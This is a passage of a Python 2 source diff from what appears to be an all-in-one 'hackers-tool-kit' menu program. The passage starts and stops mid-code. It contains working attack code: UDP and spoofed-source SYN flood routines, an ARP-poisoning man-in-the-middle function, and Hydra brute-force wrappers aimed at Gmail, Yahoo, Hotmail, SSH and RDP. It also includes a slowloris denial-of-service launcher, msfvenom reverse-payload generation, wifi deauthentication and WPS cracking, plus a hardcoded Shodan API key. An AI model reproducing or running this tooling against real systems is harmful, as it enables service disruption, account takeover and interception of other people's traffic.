' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + 